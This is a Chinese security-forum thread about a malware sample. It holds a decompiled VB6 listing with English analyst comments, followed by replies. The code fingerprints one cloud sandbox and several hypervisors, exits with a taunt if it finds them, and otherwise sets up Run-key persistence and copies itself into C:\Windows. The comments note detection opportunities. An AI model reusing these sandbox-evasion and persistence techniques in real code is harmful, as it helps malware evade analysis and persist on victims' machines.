
[病毒样本] 虚拟机测试不了的病毒

wowocock
发表于 2019-4-1 10:11:38 | 显示全部楼层
' Decompiler output (VB6 p-code/native recovery) of the sample's Form_Load handler.
' Not compilable as-is: "%dl" stands for a register value the decompiler could not
' name, loc_XXXXXXXX labels are code addresses, and "vbCrLf" appears as a quoted
' literal where the source almost certainly used the vbCrLf constant.
'
' Analyst summary of what the visible code does, in order:
'   1. Enumerates WMI Win32_ComputerSystem and builds a text report of its fields.
'   2. Exits with a taunt if three values equal "Red Hat" / "KVM" / "vbccsb"
'      (the forum thread attributes this to a specific cloud sandbox's fixed
'      manufacturer/model/username - inferred, not provable from this listing).
'   3. Exits with a second taunt if any of four strings contain "Virtual",
'      "VMware" or "Hyper-V".
'   4. Otherwise writes an HKLM ...\CurrentVersion\Run value and copies itself
'      under C:\Windows\ with a random numeric name.
' Detection opportunities: WMI query of Win32_ComputerSystem followed by a
' WScript.Shell RegWrite to the Run key and a file create in C:\Windows\.
Private Sub Form_Load() '402050
  Dim var_84 As App
  Dim var_88 As App
  Dim var_8C As App
  ' --- 1. WMI enumeration: GetObject("winmgmts:") then iterate Win32_ComputerSystem instances.
  loc_0040217D: var_1E4 = "Win32_ComputerSystem"
  loc_004021CC: var_BC = GetObject("winmgmts:", var_AC)
  loc_00402215: var_eax = %dl
  loc_0040221F: Set var_24 = %dl
  loc_0040226B: call For Each(var_23C, var_244, var_240, var_238, var_34, var_24, 0, esi, undef 'Ignore this '__vbaFreeVarList)
  ' Loop head; loc_00402EC7 jumps back here after each instance, loc_00402ECC is the exit.
  loc_00402277:
  loc_00402279: If For Each(var_23C, var_244, var_240, var_238, var_34, var_24, 0, esi, undef 'Ignore this '__vbaFreeVarList) = 0 Then GoTo loc_00402ECC
  ' Each "%dl" below is one property read from the current WMI instance; the
  ' decompiler lost the property names, only the Chinese labels survive
  ' (computer name, status, type, manufacturer, model, memory, domain, current
  ' user, boot state, role, system type, PC system type).
  loc_004022A2: var_1C4 = "计算机名称: "
  loc_004022AC: var_1D4 = "vbCrLf"
  loc_004022CB: var_eax = %dl
  loc_00402335: var_1C4 = "状态: "
  loc_0040233F: var_1D4 = "vbCrLf"
  loc_0040235E: var_eax = %dl
  loc_004023C8: var_1C4 = "类型: "
  loc_004023D2: var_1D4 = "vbCrLf"
  loc_004023F1: var_eax = %dl
  loc_0040245B: var_1C4 = "生产厂家: "
  loc_00402465: var_1D4 = "vbCrLf"
  loc_00402484: var_eax = %dl
  loc_004024EE: var_1C4 = "型号: "
  loc_004024F8: var_1D4 = "vbCrLf"
  loc_00402517: var_eax = %dl
  loc_00402524: var_BC = var_44 & "计算机名称: " & %dl & "vbCrLf" & "状态: " & %dl & "vbCrLf" & "类型: " & %dl & "vbCrLf" & "生产厂家: " & %dl & "vbCrLf" & "型号: " & %dl
  loc_00402587: var_1C4 = "内存: ~"
  loc_004025A5: var_1E4 = "Gib"
  loc_004025AF: var_1F4 = "vbCrLf"
  loc_004025CE: var_eax = %dl
  ' 1073741824 = 2^30: converts a byte count to GiB for the report.
  loc_00402601: var_DC = var_BC & "vbCrLf" & "内存: ~" & %dl / 1073741824 & "Gib"
  loc_00402665: var_1C4 = "域: "
  loc_0040266F: var_1D4 = "vbCrLf"
  loc_0040268E: var_eax = %dl
  loc_004026DA: var_1C4 = "当前用户: "
  loc_004026EA: var_1D4 = "vbCrLf"
  loc_00402721: var_eax = %dl
  loc_0040278B: var_1C4 = "启动状态"
  loc_00402795: var_1D4 = "vbCrLf"
  loc_004027B4: var_eax = %dl
  loc_0040281E: var_1C4 = "该计算机属于"
  loc_00402828: var_1D4 = "vbCrLf"
  loc_00402847: var_eax = %dl
  loc_004028B1: var_1C4 = "系统类型"
  loc_004028BB: var_1D4 = "vbCrLf"
  loc_004028C5: var_9C = var_DC & "vbCrLf" & "域: " & %dl & "vbCrLf" & "当前用户: " & %dl & "vbCrLf" & "启动状态" & %dl & "vbCrLf" & "该计算机属于" & %dl & "vbCrLf" & "系统类型"
  loc_004028DA: var_eax = %dl
  loc_00402944: var_1C4 = "计算机类类型"
  loc_0040294E: var_1D4 = "vbCrLf"
  loc_0040296D: var_eax = %dl
  loc_00402992: var_44 = var_9C & %dl & "vbCrLf" & "计算机类类型" & %dl & "vbCrLf" & "计算机类类型" & %dl & "vbCrLf" & "计算机类类型" & %dl & "vbCrLf"
  ' --- 2. Sandbox fingerprint: all three values must match exactly (And), so a
  ' single differing field defeats this check. Which properties the three %dl
  ' values are cannot be recovered here; manufacturer/model/username is the
  ' natural reading but unconfirmed.
  loc_004029DA: var_1C4 = "Red Hat"
  loc_004029E4: var_1D4 = "KVM"
  loc_004029EE: var_1E4 = "vbccsb"
  loc_004029F8: var_eax = %dl
  loc_00402A25: var_eax = %dl
  loc_00402A60: var_eax = %dl
  loc_00402A95: var_208 = CBool((%dl = "Red Hat") And (%dl = "KVM") And (%dl = "vbccsb"))
  loc_00402ABA: If var_208 = 0 Then GoTo loc_00402B61
  ' Match: message text is stored, then the program terminates (End). No MsgBox
  ' call is visible in this listing, so how the text is shown is not established here.
  loc_00402B0E: var_9C = "你竟然要用微步测试我???"
  loc_00402B5B: End
  loc_00402B61: 'Referenced from: 00402ABA
  ' --- 3. Hypervisor fingerprint by substring: Replace() strips the marker and
  ' the result is compared with the original (%dl); inequality means the marker
  ' was present. Four checks are OR-ed together. Note the marker list is
  ' "Virtual", "VMware", "Hyper-V", "Hyper-V" - "Hyper-V" is tested twice on two
  ' different strings, and neither "VirtualBox"/"QEMU"/"Xen" nor any other
  ' indicator is checked; only these substrings matter to this sample.
  loc_00402B73: var_eax = %dl
  loc_00402B87: var_eax = %dl
  loc_00402B9B: var_eax = %dl
  loc_00402BAF: var_eax = %dl
  loc_00402BCF: var_6C = CStr(var_9C)
  loc_00402BF7: var_A4 = Replace(var_6C, "Virtual", vbNullString, 1, -1, 0)
  loc_00402C07: var_70 = CStr(var_DC)
  loc_00402C18: var_E4 = Replace(var_70, "VMware", vbNullString, 1, -1, 0)
  loc_00402C3F: var_74 = CStr(var_12C)
  loc_00402C52: var_134 = Replace(var_74, "Hyper-V", vbNullString, 1, -1, 0)
  loc_00402C77: var_78 = CStr(var_17C)
  loc_00402C8A: var_184 = Replace(var_78, "Hyper-V", vbNullString, 1, -1, 0)
  ' Replace(..., compare = 0) is vbBinaryCompare: matching is case-sensitive.
  loc_00402CAD: var_eax = %dl
  loc_00402CBA: var_ret_7 = (Replace(var_6C, "Virtual", vbNullString, 1, -1, 0) <> %dl)
  loc_00402CDA: var_eax = %dl
  loc_00402CE7: var_ret_8 = (Replace(var_70, "VMware", vbNullString, 1, -1, 0) <> %dl)
  loc_00402CF5: call Or(var_11C, var_ret_8, var_ret_7)
  loc_00402D15: var_eax = %dl
  loc_00402D22: var_ret_9 = (Replace(var_74, "Hyper-V", vbNullString, 1, -1, 0) <> %dl)
  loc_00402D30: call Or(var_16C, var_ret_9, Or(var_11C, var_ret_8, var_ret_7))
  loc_00402D50: var_eax = %dl
  loc_00402D5D: var_ret_A = (Replace(var_78, "Hyper-V", vbNullString, 1, -1, 0) <> %dl)
  loc_00402D6B: call Or(var_1BC, var_ret_A, Or(var_16C, var_ret_9, Or(var_11C, var_ret_8, var_ret_7)))
  loc_00402D7B: var_208 = CBool(Or(var_1BC, var_ret_A, Or(var_16C, var_ret_9, Or(var_11C, var_ret_8, var_ret_7))))
  loc_00402DFA: If var_208 = 0 Then GoTo loc_00402EA1
  ' Any marker found: second taunt, then terminate.
  loc_00402E4E: var_9C = "你竟然要用虚拟机测试我???"
  loc_00402E9B: End
  loc_00402EA1: 'Referenced from: 00402DFA
  ' Advance to the next Win32_ComputerSystem instance (normally there is exactly one).
  loc_00402EC1: Next var_240
  loc_00402EC7: GoTo loc_00402277
  loc_00402ECC: 'Referenced from: 00402279
  ' --- 4. Reached only on a machine that passed both checks: persistence.
  ' Randomize(10) seeds the RNG with a constant, so the "random" file name
  ' below is deterministic for a given Rnd sequence - a usable IoC pattern.
  loc_00402EE7: Randomize(10)
  loc_00402F18: Set var_68 = CreateObject("wscript.shell", 0)
  loc_00402F47: var_84 = Global.App
  loc_00402F6E: var_6C = Global.EXEName
  ' Run value name is the sample's own EXE name (without extension).
  loc_00402F97: var_94 = "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & var_6C
  loc_00402FD0: var_88 = Global.App
  loc_00402FF7: var_70 = Global.Path
  loc_00403038: var_8C = Global.App
  loc_0040305F: var_74 = Global.EXEName
  ' var_00401D84 is an unresolved string constant; by position it is presumably
  ' the path separator "\" between App.Path and App.EXEName - unconfirmed.
  loc_004030BD: var_A4 = var_70 & var_00401D84 & var_74 & ".exe"
  ' "Me.regwrite" is a decompiler artifact; in context this is the
  ' WScript.Shell.RegWrite call writing the Run value above (value data:
  ' the current executable's own path, i.e. the ORIGINAL location, not the copy).
  ' Writing HKLM requires the process to be elevated; behaviour on failure is not visible here.
  loc_00403111: var_68 = Me.regwrite
  loc_0040316E: var_1E4 = "C:\Windows\"
  ' Destination: "C:\Windows\" + Str(Int(Rnd(10) * 100000)). VB's Str() prefixes
  ' a leading space for non-negative numbers, so the copy is most likely named
  ' " <up to 5 digits>" with no extension - an unusual artifact worth hunting for.
  loc_004031F7: var_54 = "C:\Windows\" + Str(Int((Rnd(10) * 100000)))
  loc_00403242: var_84 = Global.App
  loc_00403269: var_6C = Global.Path
  loc_004032AA: var_88 = Global.App
  loc_004032D1: var_70 = Global.EXEName
  ' Self-copy of the running binary into the Windows directory. Note the Run key
  ' written earlier still points at the original path, so the copy is not what
  ' autostarts; whether that is intentional cannot be told from this listing.
  loc_00403328: FileCopy var_6C & var_00401D84 & var_70 & ".exe", CStr(var_54)
  loc_00403382: GoTo loc_00403455
  ' loc_00403454 is unreachable from the visible flow (likely an error-handler
  ' or compiler-generated epilogue the decompiler kept).
  loc_00403454: Exit Sub
  loc_00403455: 'Referenced from: 00403382
  loc_00403499: Exit Sub
End Sub

落华无痕 + 2 这人真坏。


落华无痕
发表于 2019-4-1 22:46:55 | 显示全部楼层
早就觉得微步那个万年不变的用户名有问题,没想到还真有人针对这个。
www-tekeze
发表于 2019-4-1 22:51:53 | 显示全部楼层
落华无痕 发表于 2019-4-1 22:46
早就觉得微步那个万年不变的用户名有问题,没想到还真有人针对这个。

也针对微步云沙箱? 从楼上大佬给的看,会检测VM、VB、H-V,但影子里也运行不了。。


落华无痕
发表于 2019-4-2 12:38:52 | 显示全部楼层
www-tekeze 发表于 2019-4-1 22:51
也针对微步云沙箱? 从楼上大佬给的看,会检测VM、VB、H-V,但影子里也运行不了。。

看代码就知道了。另外二楼的连接,看运行图片。
www-tekeze
发表于 2019-4-2 12:41:51 | 显示全部楼层
本帖最后由 www-tekeze 于 2019-4-2 12:43 编辑
落华无痕 发表于 2019-4-2 12:38
看代码就知道了。另外二楼的连接,看运行图片。

代码哪里看出来反影子呢。。   图片11、12楼我都给了。


落华无痕
发表于 2019-4-2 20:28:47 | 显示全部楼层
www-tekeze 发表于 2019-4-2 12:41
代码哪里看出来反影子呢。。   图片11、12楼我都给了。

傻啊,哪里是反影子。是反所有机器,实机运行也这样提示。
wwwmjrcom
发表于 2019-4-2 21:39:17 | 显示全部楼层
卡巴扫描miss
2512975065
发表于 2019-4-2 23:50:40 来自手机 | 显示全部楼层
一个恶搞程序,嘿嘿
lovelovelove
发表于 2019-5-10 20:08:14 | 显示全部楼层
不算病毒,只是恶搞工具而已

